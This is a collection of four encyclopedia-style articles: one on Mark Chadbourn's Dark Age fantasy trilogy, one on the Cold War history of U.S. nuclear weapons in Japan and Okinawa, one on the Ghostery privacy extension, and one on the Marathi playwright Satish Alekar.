Hunter, a Government special forces agent and his friend Hal, a Government office clerk are the central characters who find themselves Brothers of Dragons up against a dark power, The Void which wants to stamp out all of Existence.
The Government want to round up the Brothers and Sisters of Dragons for their own end and this leads Hunter to capture Mallory and gets Sophie Shot. Believing her dead Mallory escapes with Hunter to seek out the remaining original Brothers and Sisters of Dragons.
Hal keeps his identity as a Brother of Dragons secret but goes on his own mission to find out what he can to help the fight against the Void. He has several encounters with creatures from
the Otherworld.
Sophie is not dead but ends up in the Far Lands where she joins Caitlin Shepherd, no longer a Sister of Dragons. Caitlin regains the Morrigan and the two help Lugh and his court escape a siege before returning to Oxford.
During the final battle against the Void's army, Hal is accused of killing the Prime Minister. This is a ruse by the Government to get all the Brothers and Sisters together in order to sacrifice them to The Void. The Government want law and order restored and see the unpredictability that magic, and the Brothers and Sisters of Dragons offer as a threat to this.
The Void regains control, people return to their mundane ordinary lives and the world has reverted to how it was before The Age of Misrule
Hal escapes The Void and enters the Blue Fire to travel through time and set in motion events to bring back the original leader of the Brothers and Sisters of Dragons, Jack Churchill, as Existence's last hope in the battle with the Void.
The title of the book refers to The Hounds of Avalon, who once heard baying indicate the end of the world
Characters in "The Dark Age Trilogy"
Brothers and Sisters of Dragons:
Mallory is the first Brother of Dragons during the Dark Age. A cynical man, he was once a student of the Classics. The Tuatha call him the Dead Man, on account of him killing himself in another dimension and awakening in ours. His past troubles him and he resents authority.
Sophie Tallant is a priestess for a group called the New Celtic Nation, and becomes close to Mallory. She practises her craft and is able to visit Mallory in his dreams. She has strong beliefs and will stand up for them.
Caitlin Shepherd is a country GP. The death of her husband and son fracture her mind and she struggles to keep control of her multiple personalities. The Tuatha call her the Broken Woman.
Hunter is a Special Ops field leader for the remains of the SBS. He is tough, sharp talking, and a bit of a ladies man. He appears to take his brutal work in his stride but in reality remembers all the faces of those he has killed. His best friend is Hal.
Hal is a silent office-drone in the reconstituted British government. Withdrawn, his role in the coming conflict is discovered at the very end. He is full of self-doubt, but is good at problem solving. The Tuatha call him the Shadow Mage.
Other important humans:
Jez Miller is Mallory's main friend in the Knights Templar. He joined because he believes in their cause and faith. He is naive and sees the good in everyone.
Mary is an old witch/herbalist who knows Caitlin. Self-loathing and alcoholic, she sees Caitlin as a daughter and makes her own sacrifice to bring the Goddess(the sacred feminine) back to the world.
Jack a teenager who has spent most of his life a prisoner of the Tuatha Dé Danann and been subjected to various experiments. He helps Caitlin and company escape from Lugh's court after they release him from his cell.
Celtic gods (the Tuatha Dé Danann) and Courts:
Cernunnos one of the most powerful gods, appears in Devil in Green to aid Mallory and again in the Hounds of Avalon. His other half is the triple goddess. He leads the Wild Hunt, who once called cannot be stopped until a kill has been made
The triple Goddess or Mother, maiden crone, is searched for in Queen of Sinister and one of her aspects, the Morrigan is key to Caitlin's survival.
Rhiannon is queen of the Court of Peaceful Days. Mallory ends up there after being attacked on Salisbury Plain. Though this court has renounced violence, Rhiannon gives Mallory the sword of Llyrwyn
Lugh rules the Court of Soul's Ease. His court is the first Caitlin enters in the Queen of Sinister. Initially he is diminished because he no longer fights for Existence, but this changes and he fights in the final battle in the Hounds of Avalon.
Dian Cecht rules the court of The Final Word. Here experiments on humans are carried out and this is where Jack spent much of his life. Dian Cecht is the great healer of the Tuatha. Like a lot of the Tuatha he can appear cold and aloof but is fascinated by humans or Fragile Creatures as the Tuatha refer to them
Math lives in a tower in the court of Soul's Ease. He wears a mask of four different animals: a boar, a falcon, a salmon and a bear. Caitlin and Sophie approach him for aid in Hounds of Avalon.
Major themes
General themes of the trilogy are the core issues of our own Dark Ages - faith, plague/illness, war/politics. The books strip away the trappings of modern society to see how we would cope against the great challenges of life without our support network.
The books look at the fallibility of human nature, and at what can happen when different beliefs clash. They also question the wisdom of those who seek power attaining it.
The idea of an Afterlife is also included.
Awards and nominations
All were shortlisted for the British Fantasy Society's August Derleth Award for Best Novel - the first time three books from a trilogy have been shortlisted
Publication history
The Devil In Green (The Dark Age book I) Gollancz (UK) October 2002
The Queen of Sinister (The Dark Age book II) Gollancz (UK) March 2004
The Hounds of Avalon (The Dark Age book III) Gollancz (UK) April 2005
Sources, references, external links, reviews
An interview with Mark Chadbourn on the subject of his work
Chadbourn's website
The SF Site Reviews
Buy Mark Chadbourn's books at Amazon
Fantasy novel series
Novels by Mark Chadbourn
|
53513370
|
https://en.wikipedia.org/wiki/U.S.%20nuclear%20weapons%20in%20Japan
|
U.S. nuclear weapons in Japan
|
United States nuclear weapons were stored secretly at bases throughout Japan following World War II. Secret agreements between the two governments allowed nuclear weapons to remain in Japan until 1972, to move through Japanese territory, and for the return of the weapons in time of emergency.
Nuclear war planning
In the 1950s, after U.S. interservice rivalry culminated in the "Revolt of the Admirals, a stop-gap method of naval deployment of nuclear weapons was developed using the Lockheed P-2 Neptune and North American AJ-2 Savage aboard aircraft carriers. Forrestal-class aircraft carriers with jet bombers, as well as missiles with miniaturized nuclear weapons, soon entered service, and regular transits of U.S. nuclear weapons through Japan began thereafter.
U.S. leaders contemplated the first use of nuclear weapons, including those based in Japan following the intervention by the People's Republic of China during the Korean War. A command-and-control team was then established in Tokyo by Strategic Air Command and President Truman authorized the transfer to Okinawa of atomic-capable B-29s armed with Mark 4 nuclear bombs and nine fissile cores into the custody of the U.S. Air Force.
The runways at Kadena were upgraded for Convair B-36 Peacemaker use. Reconnaissance RB-36s were deployed to Yokota Air Base in late 1952. Boeing B-50 Superfortress and Convair B-36 Peacemaker bombers were deployed to Japan and Okinawa in August 1953 to join B-29s already based there.
Following the Korean War, U.S. nuclear weapons based in the region were considered for Operation Vulture to support French military forces in Vietnam.
By the 1960s Okinawa was known as "The Keystone of the Pacific" to U.S. strategists and as "The Rock" to U.S. servicemen. Okinawa was critical to America's Vietnam war effort where commanders reasoned that, "without Okinawa, we cannot carry on the Vietnam war."
During U.S. involvement in the Vietnam War the use of nuclear weapons was suggested in order to "defoliate forests, destroy bridges, roads, and railroad lines." In addition, the use of nuclear weapons was suggested during the planning for the bombing of Vietnam's dikes in order to flood rice paddies, disrupt the North Vietnamese food supply, and leverage Hanoi during negotiations. Each of the cold war plans employing a U.S. launched nuclear first strike were ultimately rejected.
Strategic Air Command had designated Kadena (as well as Yokota Air Base on the mainland), as a dispersal location for new airborne command post aircraft, codenamed "Blue Eagle", in 1965. The 9th Airborne Command and Control Squadron of the 15th Air Base Wing provided this airborne command and control to Commander in Chief Pacific Command from Hickam Air Force Base, Hawaii, after 1969.
Specially-equipped United States Navy C-130s, operating from Japanese bases, enabled the National Command Authority to control Single Integrated Operational Plan (SIOP) processes for theater or general nuclear war. These exercises continued at least into the 1990s.
Nuclear weapons deployment, storage and transit
Okinawa hosted 'hundreds of nuclear warheads and a large arsenal of chemical munitions,' for many years.
Article 9 of the Japanese Constitution, written by MacArthur immediately after the war, contains a total rejection of nuclear weapons. But when the U.S. military occupation of Japan ended in 1951, a new security treaty was signed that granted the United States rights to base its "land, sea, and air forces in and about Japan."
In 1959, Prime Minister Nobusuke Kishi stated that Japan would neither develop nuclear weapons nor permit them on its territory". He instituted the Three Non-Nuclear Principles--"no production, no possession, and no introduction."
A 1960 accord with Japan permits the United States to move weapons of mass destruction through Japanese territory and allows American warships and submarines to carry nuclear weapons into Japan's ports and American aircraft to bring them in during landings. The agreement allows the United States to deploy or store nuclear arms in Japan without requiring the express permission of the Japanese Government. The discussion took place during negotiations in 1959, and the agreement was made in 1960 by Aiichiro Fujiyama, then Japan's Foreign Minister.
There were many things left unsaid; it was a very sophisticated negotiation. The Japanese are masters at understood and unspoken communication in which one is asked to draw inferences from what may not be articulated.
The secret agreement was concluded without any Japanese text so that it could be plausibly denied in Japan. Since only the American officials recorded the oral agreement, not having the agreement recorded in Japanese allowed Japan's leaders to deny its existence without fear that someone would leak a document to prove them wrong. The arrangement also made it appear that the United States alone was responsible for the transit of nuclear munitions through Japan. However, the original agreement document turned up in 1969 during preparation for an updated agreement, when a memorandum was written by a group of U.S. officials from the National Security Council Staff; the Departments of State, Defense, Army, Commerce and Treasury; the Joint Chiefs of Staff; the Central Intelligence Agency; and the United States Information Agency.
A 1963 national intelligence estimate authored by the Central Intelligence Agency, Japans Problems and Prospects stated that:
Post-war governance of Southern Japanese Island chains
After the Battle of Okinawa the island was first placed under the control of the United States Navy. Following the surrender of Japan, the U.S military occupied Japan and Okinawa was put under control of the United States Military Government of the Ryukyu Islands on September 21, 1945, and an Okinawa Advisory Council was created.
Following the war, the Bonin Islands including Chichi Jima, the Ryukyu Islands including Okinawa, and the Volcano Islands including Iwo Jima were retained under American control.
In 1952 Japan signed the Treaty of San Francisco that allowed the future control of Okinawa and Japan's southern islands by the United States Military Government (USMG) in post-occupation Japan. The United States Civil Administration of the Ryukyu Islands (USCAR), as part of the Department of Defense, maintained overriding authority over the Japanese Government of the Ryukyu Islands.
Return
The Johnson administration gradually realized that it would be forced to return Chichi Jima and Iwo Jima "to delay reversion of the more important Okinawa bases" however, President Johnson also wanted Japan's support for U.S. military operations in Southeast Asia."
Prime Minister Eisaku Satō and Foreign Minister Takeo Miki had explained to the Japanese parliament that "the return of the Bonins had nothing to do with nuclear weapons yet the final agreement included a secret annex, and its exact wording remained classified." A December 30, 1968, cable from the U.S. embassy in Tokyo is titled "Bonin Agreement Nuclear Storage," but within the same file "the National Archives contains a 'withdrawal sheet' for an attached Tokyo cable dated April 10, 1968, titled 'Bonins Agreement--Secret Annex,'". The Bonin and Volcano islands were eventually returned to Japan in June 1968.
On the one year anniversary of a B-52 explosion and near-miss at Kadena Prime Minister Sato and President Nixon met in Washington, DC where several agreements including a revised Status of Forces Agreement (SOFA) and a formal policy related to the future deployment of nuclear weapons on Okinawa were reached.
A draft of the November 21, 1969, Agreed Minute to Joint Communique of United States President Nixon and Japanese Prime Minister Sato was found in 1994. The English text of the draft agreement reads:
United States President:
Japanese Prime Minister:
This situation persisted until the 1971 Okinawa Reversion Agreement took effect on May 15, 1972, when the Ryukyu Islands were returned to Japan.
Nuclear weapons bases in Japan
A declassified 1956-57 Far East Command manual, Standing Operating Procedures for Atomic Operations, revealed that, there were thirteen locations in Japan that "had "nuclear weapons or their components, or were earmarked to receive them in times of crisis or war." Among the nuclear-capable base locations were Misawa Air Base and Itazuke Air Bases and Yokosuka and Sasebo on U.S. Navy warships that held nuclear weapons. The Bulletin of the Atomic Scientists reveals that the other locations that held nuclear weapons in Japan were Johnson Air Base, Atsugi Air Base, Komaki Air Base, and Iwakuni Air Base.
Southern Japanese Island chains
The island chains were among the thirteen separate locations in Japan that had nuclear weapons. According to a former U.S. Air Force officer stationed on Iwo Jima, the island would have served as a recovery facility for bombers after they had dropped their bombs in the Soviet Union or China. War planners reasoned that bombers could return Iwo Jima, "where they would be refueled, reloaded, and readied to deliver a second salvo as an assumption was that the major U.S. Bases in Japan and the Pacific theater would be destroyed in a nuclear war." It was believed by war planners that a small base might evade destruction and be a safe harbor for surviving submarines to reload. Supplies to re-equip submarines as well as Anti-submarine weapons were stored within caves on Chichi Jima.
Okinawa
At one point Okinawa hosted approximately 1,200 nuclear warheads. The Okinawa-based nuclear weapons included 19 different weapons systems.
From 1955–56 to 1960, the 663rd Field Artillery Battalion operated the Army's 280mm M65 Atomic Cannon ("Atomic Annie") from Okinawa. In the 1960s, nuclear storage locations included four MGM-13 Mace missile sites, Chibana at Kadena Air Base, Naha Air Base, Henoko [Camp Henoko (Ordnance Ammunition Depot) at Camp Schwab], and the Army MIM-14 Nike-Hercules air defense launch locations.
Nuclear Weapons in Okinawa
From 1961 to 1969, the 498th Tactical Missile Group operated the MGM-13 Mace nuclear-armed cruise missile on Okinawa. Thirty-two Mace missiles were kept on constant alert in hardened hangars at four Okinawa launch sites by the 873d Tactical Missile Squadron. The four Mace sites were assigned to Kadena Air Base and located at Bolo Point in Yomitan, Onna Point, White Beach, and in Kin just north of Camp Hansen.
There were eight Nike-Hercules launch sites dispersed throughout the Ryukyu Islands. The Integrated Fire Control area (IFC) for the islands anti-air missile systems was located at Naha AFB. The Army's 97th Anti-Aircraft Artillery Group received Nike-Hercules SAMs in 1959, and with two name changes (the formation became the 30th Artillery Brigade (Air Defense) and then the 30th Air Defense Artillery Brigade), the U.S. Army continued to operate the Nike missiles there until June 1973, when all the Nike sites were turned over to the Japan Air Self-Defense Force.
North American F-100 Super Sabre fighter-bombers capable of carrying hydrogen bombs were also present at Kadena Air Base.
The Chibana depot held warheads for atomic and thermonuclear weapons systems in the hardened weapon storage area. The depot held the Mark 28 nuclear bomb warheads used in the MGM-13 Mace cruise missile as well as warheads for nuclear armed MGR-1 Honest John and MIM-14 Nike-Hercules (Nike-H) missiles.
Nuclear weapons were stored in Henoko at an ammunition depot adjacent to Camp Schwab. The depot was constructed in 1959 for the U.S. Army 137th Ordnance Company (Special Weapons).
In July 1967, a proposal to greatly expand the base at Henoko was made by the United States Department of Defense. The plan included construction of an expanded special weapon storage area to house nuclear weapons, a port, and runways adjacent to Camp Schwab. The plan was approved in 1968 by JCS Chairman Earle Wheeler and U.S. Secretary of Defense Robert S. McNamara, a fact that only came to light in 2016. The plan was not implemented over fears that the required seizure of civilian-owned land would cause protests to erupt as well as a decreased need in the drawn down of the Vietnam War, and budgetary restrictions.
After reversion in 1972, Camp Henoko was created when the Army's Henoko Ammunition Storage Depot was turned over to the U.S. Marine Corps's Henoko Navy Ammunition Storage Facilities. The facility is now known as Henoko Ordnance Ammunition Depot.
Nuclear weapons accidents
Nuclear weapons incidents on the island that were publicized garnered international opposition to chemical and nuclear weapons and set the stage for the 1971 Okinawa Reversion Agreement to officially ending the U.S. military occupation on Okinawa.
In June or July 1959, a MIM-14 Nike-Hercules anti-aircraft missile was accidentally fired from the Nike site 8 battery at Naha Air Base on Okinawa which according to some witnesses, was complete with a nuclear warhead. While the missile was undergoing continuity testing of the firing circuit, known as a squib test, stray voltage caused a short circuit in a faulty cable that was lying in a puddle and allowed the missile's rocket engines to ignite with the launcher still in a horizontal position. The Nike missile left the launcher and smashed through a fence and down into a beach area skipping the warhead out across the water "like a stone." The rocket's exhaust blast killed two Army technicians and injured one. Similar accidental launches of the Nike-H missile had occurred at Fort George G. Meade and in South Korea. Newsweek magazine reported that following a highly publicized U.S. nuclear weapons accident in 1961, Kennedy was informed that, "there two cases in which nuclear armed anti-aircraft missiles were actually launched by inadvertence."
On October 28, 1962, during the peak of the Cuban Missile Crisis, U.S. strategic forces were at Defense Condition Two (DEFCON 2). According to missile technicians who witnessed events, the four MACE B missile sites on Okinawa erroneously received coded launch orders to fire all of their 32 nuclear cruise missiles at the Soviets and their allies. Quick thinking by Capt. William Bassett who questioned whether the order was "the real thing, or the biggest screw up we will ever experience in our lifetime" delayed the orders to launch until the error was realized by the missile operations center. According to witness John Bordne, Capt. Bassett was the senior field officer commanding the missiles and was nearly forced to have a subordinate lieutenant who was intent on following the orders to launch his missiles shot by armed guards. No U.S. Government record of this incident has ever been officially released. Former missileers have refuted Bordne's account.
Next, on December 5, 1965, in an incident at sea near Okinawa, an A-4 Skyhawk attack aircraft rolled off of an elevator of the aircraft carrier the USS Ticonderoga (CV-14) into 16,000 feet of water resulting in the loss of the pilot, the aircraft, and the B43 nuclear bomb it was carrying, all of which were too deep for recovery. Since the ship was traveling to Japan from duty in the Vietnam war zone, no public mention was made of the incident at the time and it would not come to light until 1981 when a Pentagon report revealed that a one-megaton bomb had been lost. Japan then formally asked for details of the incident.
In September 1968, Japanese newspapers reported that radioactive Cobalt-60 had been detected contaminating portions of the Naha Port Facility, sickening three. The radioactive contamination was believed by scientists to have emanated from visiting U.S. nuclear submarines.
At former nuclear storage areas in Okinawa, including at Henoko, where construction of a proposed air base for the relocation of MCAS Futenma has been planned adjacent to the weapon storage facility, environmental concerns have been raised by the findings of the Environmental Protection Agency of nuclear contamination at other U.S. nuclear weapons sites. The Status of Forces Agreement allows the U.S. military exemptions for environmental protection and remediation. In 1996 unused land inside the former-Chibana, now-Kadena Ammunition Storage Area was offered as a location to move the Futenma facility to. Okinawan's residing near the base munitions area protested those plans and the idea went unrealized. Later that year a location adjacent to the Henoko Ordinance Ammunition Depot at Camp Schwab was selected for the replacement facility.
1968 B-52 Crash at Kadena Air Base
On November 19, 1968, a U.S. Air Force Strategic Air Command B-52D Stratofortress with a full bomb load, broke up and caught fire after the plane aborted takeoff at Kadena Air Base, Okinawa before an Operation Arc Light bombing mission to the Socialist Republic of Vietnam during the Vietnam War. The pilot was able to keep the plane on the ground and bring the aircraft to a stop while preventing a much larger catastrophe. The aircraft came to rest near the edge of the Kadena's perimeter, some 250 meters from the Chibana Ammunition Depot.
The crash led to demands to remove the B-52s from Okinawa and strengthened a push for the reversion from U.S. rule in Okinawa. Okinawans had correctly suspected that the Chibana depot held nuclear weapons. The crash, together with a nerve gas leak from Chibana Depot the following year sparked fears that another potential disaster on the island could put the chemical and nuclear stockpile and the surrounding population in jeopardy and increased the urgency of moving them to a less populated and less active storage location.
Weapon withdrawal
A U.S. policy to neither confirm nor deny the presence of nuclear weapons was created during the late 1950s when Japan's government asked for a guarantee that U.S. nuclear weapons would not be based "in Japan."
The U.S. eventually revealed the presence of nuclear weapons during negotiations over the 1971 Okinawa Reversion Agreement, which later returned sovereignty to Japan. In 1971, "the U.S. government demanded and received payment from the Japanese government to help defray the expenses of removing nuclear weapons from Okinawa".
During Okinawa's reversion to Japan in 1972, CINCPAC and the U.S. National Security Council (NSC) concluded that Japan's government "tacitly" allowed nuclear weapons to enter Japanese harbors on warships as had been outlined in earlier secret agreements with Japan.
The effect of 1971 agreements was that the U.S. would remove nuclear weapons at sites in Japan in exchange for ships with nuclear weapons being permitted to visit ports. Nuclear weapons based on Okinawa were reportedly removed prior to 1972. However, though a diplomatic notification was suggested, permission from Japan was not a requirement for the return of U.S. nuclear weapons. In a 1981 interview, Reischauer confirmed, "U.S. naval vessels carrying nuclear weapons routinely visited ports in Japan with the tacit approval of the Japanese government, violating the LDP's oft-stated 'three non-nuclear principles' prohibiting their manufacture, possession, or introduction."
When Japan asserted that nuclear weapons must be removed after reversion, they were withdrawn from sites in Okinawa during the early 1970s. Kristensen writes that criticisms following a 1969 Far East visit by a U.S. Senate Foreign Relations Committee prompted the JCS in 1974 to order a study of the forward-deployed tactical nuclear weapons at East Asian bases. The study found the number of sites could be reduced because they had had more weapons than required, as well as that response teams at sites with nuclear weapons were unprepared for a coordinated attack and might be vulnerable to terrorists. Following the JCS order, the Department of Defense began withdrawing U.S. tactical nuclear weapons from Taiwan in 1974, and from the Philippines in 1976. Kristensen writes that the DOD withdrawal of forward-deployed weapons was 'not simply' due to the sovereignty-return negotiations.
After reversion, the nuclear alert role on Okinawa increased and command and control aircraft continued to operate from the island. The U.S. continues to follow the policy of "neither confirm nor deny" regarding the present location of U.S. nuclear weapons and in many cases, of past locations.
Subsequent developments
Early in March 2010, a Government of Japan inquiry revealed the existence of secret agreements for nuclear weapons brought into Japan. The panel findings ended decades of official denial about the secret nuclear agreements in Japan.
The Liberal Democratic Party had been in power for the last 50 years. The long-ruling conservatives repeatedly denied the existence of pacts. In an effort by Prime Minister Yukio Hatoyama to restore public trust, the panel was set up by Japan's newly elected Democratic Party and its creation was motivated by an effort to increase transparency about the secret nuclear agreements with the U.S.
Japan's Foreign Minister Katsuya Okada revealed the findings of the panel and admitted that previous governments had lied to the Japanese public, over decades, about nuclear weapons agreements with the U.S. in violation of the country's non-nuclear principles. The pacts had been kept secret for over five decades over fears of public anger.
The existence of the secret pacts were already an open secret as the deals were already revealed in declassified U.S. files.
One of the secret pacts was revealed in 1972 when Takichi Nishiyama, a reporter for Mainichi Daily uncovered one secret pact. He was convicted and jailed for obtaining it.
Four previously secret pacts were released in Japan as part of the announcement. The pacts showed different interpretations between the countries of restrictions and an "unspoken understanding" permitting port calls for warships without prior consent.
The announcement revealed that an April 1963 meeting between Reischauer and Foreign Minister Masayoshi Ohira where a "full mutual understanding" on the "transit issue" was reached.
The release also revealed a "vague" secret agreement over Japan's cost burdens for Okinawa's 1972 reversion to Japan.
Hans Kristensen, of the Federation of American Scientists said that at the time the country was facing a difficult decision between national security for Japan under a U.S. nuclear umbrella or telling the public the truth; the decision makers chose to be "economical with the truth." The pacts revealed that nuclear weapons could be returned to Japan during a military crisis in Korea.
In December 2015, the United States Government acknowledged officially for the first time that it had stored nuclear weapons in Okinawa prior to 1972. That U.S. nuclear weapons had been located in Okinawa had long been an open secret. The fact had been widely understood or strongly speculated since the 1960s and was subsequently revealed by the U.S. military in apparently unnoticed photographs of nuclear weapons and delivery systems on Okinawa that were declassified and released to the U.S. National Archives in 1990.
In March 2017, Japan joined the United States and the established nuclear powers under the Treaty on the Non-Proliferation of Nuclear Weapons who abstained from a negotiation on the total ban of nuclear weapons at the United Nations in opposition to 113 other signatory countries involved in discussion.
Submarines with cruise missiles from the United States visit the Yokosuka and Sasebo ports as part of the nuclear deterrence and planning arrangement with Japan.
References
Nuclear weapons of the United States
Nuclear weapons program of the United States
United States Atomic Energy Commission
United States Department of Energy
Cold War history of the United States
Nuclear weapons policy
Government of Japan
Environment of Japan
Politics of Japan
Nuclear technology in Japan
History of the foreign relations of Japan
United States military in Japan
History of Okinawa Prefecture
Ryukyu Islands
|
32021735
|
https://en.wikipedia.org/wiki/Ghostery
|
Ghostery
|
Ghostery is a free and open-source privacy and security-related browser extension and mobile browser application. Since February 2017, it has been owned by the German company Cliqz International GmbH (formerly owned by Evidon, Inc., which was previously called Ghostery, Inc. and the Better Advertising Project). The code was originally developed by David Cancel and associates.
Ghostery enables its users to detect and control JavaScript "tags" and "trackers" in order to remove JavaScript bugs and beacons that are embedded in many web pages which allow for the collection of a user's browsing habits via HTTP cookies, as well as participating in more sophisticated forms of tracking such as canvas fingerprinting.
As of 2017, Ghostery is available for Mozilla Firefox, Google Chrome, Internet Explorer, Microsoft Edge, Opera, Safari, iOS, Android, and Firefox for Android.
Additionally, Ghostery's privacy team creates profiles of page elements and companies for educational purposes.
Functionality
Blocking
Ghostery blocks HTTP requests and redirects according to their source address in several ways:
Blocking third-party tracking scripts that are used by websites to collect data on user behavior for advertising, marketing, site optimization, and security purposes. These scripts, also known as "tags" or "trackers", are the underlying technology that places tracking cookies on consumers' browsers.
Continuously curating a "script library" that identifies when new tracking scripts are encountered on the Internet and automatically blocking them.
Creating "Whitelists" of websites where third-party script blocking is disabled and other advanced functionality for users to configure and personalize their experience.
When a tracker is blocked, any cookie that the tracker has placed is not accessible to anyone but the user and thus cannot be read when called upon.
Reporting
Ghostery reports all tracking packages detected, and whether Ghostery has blocked them or not, in a "findings window" accessible from clicking on the Ghostery Icon in the browser. When configured, Ghostery also displays the list of trackers present on the page in a temporary purple overlay box.
History and use
Originally developed by David Cancel, Ghostery was acquired by Evidon (renamed Ghostery, Inc.) in January 2010. Ghostery is among the most popular browser extensions for privacy protection. In 2014, Edward Snowden suggested consumers use Ghostery along with other tools to protect their online privacy.
Ghostery, Inc. made their software source code open for review in 2010, but did not release further versions of the source code after that. On February 22, 2016, the company released the EULA for the Ghostery browser extension, as a proprietary closed-source product.
Cliqz GmbH acquired Ghostery from Evidon Inc. in February 2017. Cliqz is a German company majority-owned by Hubert Burda Media. Ghostery no longer shares data of any kind with Evidon.
On March 8, 2018, Ghostery shifted back to an open source development model and published their source code on GitHub, saying that this would allow third-party contributions as well as make the software more transparent in its operations. The company said that Evidon's business model "was hard to understand and lent itself to conspiracy theories", and that its new monetization strategy would involve affiliate marketing and the sale of ad analytics data.
In May 2018, in the distribution of an email promoting changes to Ghostery's practices to comply with General Data Protection Regulation (GDPR), hundreds of user email addresses were accidentally leaked by listing them as recipients. Ghostery apologized for the incident, stating that they stopped the distribution of the email when they noticed the error, and reported that this was caused by a new in-house email system that accidentally sent the message as a single email to many recipients, rather than sending it individually to each user.
Criticism
Under its former owner Evidon, Ghostery had an opt-in feature called GhostRank. GhostRank could be enabled to "support" its privacy function. GhostRank took note of ads encountered and blocked, then sent that information back to advertisers so they could better formulate their ads to avoid being blocked. Though Ghostery claims that the data is anonymized, patterns of web page visits cannot truly be anonymized. Not everyone sees Evidon's business model as conflict-free. Jonathan Mayer, a Stanford graduate student and privacy advocate, has said: "Evidon has a financial incentive to encourage the program's adoption and discourage alternatives like Do Not Track and cookie blocking as well as to maintain positive relationships with intrusive advertising companies".
Since July 2018, with version 8.2, Ghostery shows advertisements of its own to users. Burda claims that the advertisements do not send personal data back to their servers and that they do not create a personal profile.
See also
Ad blocking
Disconnect Mobile
DoNotTrackMe
List of formerly proprietary software
NoScript
Online advertising
Privacy Badger
uBlock Origin
References
External links
Online advertising
Free Firefox WebExtensions
Google Chrome extensions
Internet privacy software
Opera Software
Internet Explorer add-ons
IOS software
Formerly proprietary software
Free and open-source Android software
Adware
|
23040565
|
https://en.wikipedia.org/wiki/Satish%20Alekar
|
Satish Alekar
|
Satish Vasant Alekar (born 30 January 1949) is a Marathi playwright, actor, and theatre director. A founder member of the Theatre Academy of Pune, and most known for his plays Mahanirvan (1974), Mahapoor (1975), Atirekee (1990), Pidhijat (2003), Mickey ani Memsahib (1973), and Begum Barve (1979), all of which he also directed for the Academy. Today, along with Mahesh Elkunchwar and Vijay Tendulkar he is one of the most influential and progressive playwrights not just in modern Marathi theatre, but also larger modern Indian theatre.
He has also remained the head of Centre for Performing Arts, University of Pune (1996–2009), which he founded, after forgoing the Directorship of NSD and previously remained an adjunct professor at various universities in US, at the Duke University, Durhum, NC (1994), Performance Studies, Tisch School of the Arts, New York University as a Fulbright Scholar (2003). and Dept. Theatre and Film Studies, University of Georgia, Athens, GA (2005)
He was awarded the Sangeet Natak Akademi Award in Playwriting (Marathi) in 1994, by Sangeet Natak Akademi, India's National Academy of Music, Dance and Drama. He received the award "Padamshree" (पद्मश्री) conferred by the President of India in January 2012.
Since 2013 Satish Alekar is nominated by Savitribai Phule Pune University as Distinguished Professor on the campus.
Recently he is also known for his screen acting both in Marathi and Hindi feature films. He is seen in the character roles of award-winning films like Ventilator (2016).
Early life and education
Alekar was born in Delhi, India, but grew up in Pune, a center of Marathi culture in Maharashtra. He studied in Marathi medium school 'New English School', Ramanbag which was established in 1880 by Lokmanya Bal Gangadhar Tilak. Further, he went to Fergusson College and completed his BSc He received his master's degree in biochemistry from University of Pune in 1972
Career
Alekar gained his first stage experience as an actor in a college play. Impressed by his performance, director Bhalba Kelkar, who had set up the Progressive Dramatic Association, invited him to join it. Alekar wrote and directed his first one-act play Jhulta Pool in 1969. He became a part of a young circle that Jabbar Patel had started within the Progressive Dramatic Association.
This group split with the parent body in 1973 and set up Theater Academy in Pune. The split was over Vijay Tendulkar's play Ghashiram Kotwal. The senior members decided against its premiere in 1972, and Patel's group decided to produce it under the auspices of its own Theater Academy. Alekar assisted Patel in the direction of Ghashiram Kotwal, and the group has since mounted over 35 plays by him and manage to establish its foothold in experimental Marathi theatre.
Alekar conceived of and implemented Playwrights Development Scheme and Regional Theater Group Development. The Ford Foundation for Theater Academy, Pune supported these programs during 1985–1994.
Alekar has collaborated in several international play translation projects. The Tisch School of Arts at New York University invited him in 2003 to teach a course on Indian Theatre. The Department of Theater and Films Studies, University of Georgia invited him in 2005 to direct an English production of his play Begum Barve.
The Holy Cow Performing Arts Group in Edinburgh, Scotland performed an English version of Alekar's Micky And Memsahib on 27 and 28 August 2009 at Riddle's Court in Edinburgh Fringe Festival '09.
During July 1996 – January 2009, Alekar worked as a professor and the Head of the Center for Performing Arts(Lalit Kala Kendra) at University of Pune. Previously he was a research officer in Biochemistry at the government-run B. J. Medical College, Pune.He was working as the Honorary Director for a program supported by Ratan Tata Trust at the University of Pune during 2009–2011. In September 2013 University of Pune honoured Satish Alekar by nominating him as Distinguished Professor on the campus. University of Pune is the first state University in India to nominate Distinguished Professors on the campus.
Plays
List of original Marathi मराठी plays written since 1973
Micki Aani Memsaheb मिकी आणि मेमसाहेब (1973)*
Mahanirvan महानिर्वाण (1974)*
Mahapoor महापूर (1975)
Begum Barve बेगम बर्वे (1979)*
Shanwar Raviwar शनवार रविवार (1982)*
Dusra Samana दुसरा सामना (1987)
Atireki अतिरेकी (1990)*
Pidhijat पिढीजात (2003)*
Ek Divas Mathakade एक दिवस मठाकडे (2012)
Thakishi Sanvad' ठकीशी संवाद (2020) New Play written during COVID-19 lockdown (March–July 2020) to be produced in 2021–22
* Plays directed by Satish Alekar for Theatre Academy, Pune.
Mahapoor (1975) Directed by Mohan Gokhale for Theatre Academy, Pune
Dusra Samna (1987) Directed by Waman Kendre for Kala Vaibhav, Mumbai
Ek Divas Mathakade (2012) Directed by Nipun Dharmadhikari for Natak Company, Pune
List of original Marathi मराठी one-act plays
Memory मेमरी (1969)
Bhajan भजन (1969)
Ek Zulta Pool एक झुलता पूल (1971)*
Dar Koni Ughadat Naahi दर कोणी उघडत नाही (1979)
Bus Stop बस स्टॅाप (1980)
List of adapted/translated one-act plays
Judge जज्ज (1968)
Yamuche Rahasya यमुचे रहस्य (1976)
Bhint भिंत (1980)*
Valan वळण(1980)*
Alshi Uttarvalyachi Gosht आळशी अत्तरवाल्याची गोष्ट (1999)**
Nashibvan Baiche Don नशीबवान बाईचे दोन (1999)**
Supari सुपारी (2002)
Karmaachari कर्मचारी (2009)
** Directed by Satish Alekar for Lalit Kala Kendra ललित कला केंद्र (Centre For Performing Arts, University of Pune)
* Directed for Theatre Academy, Pune
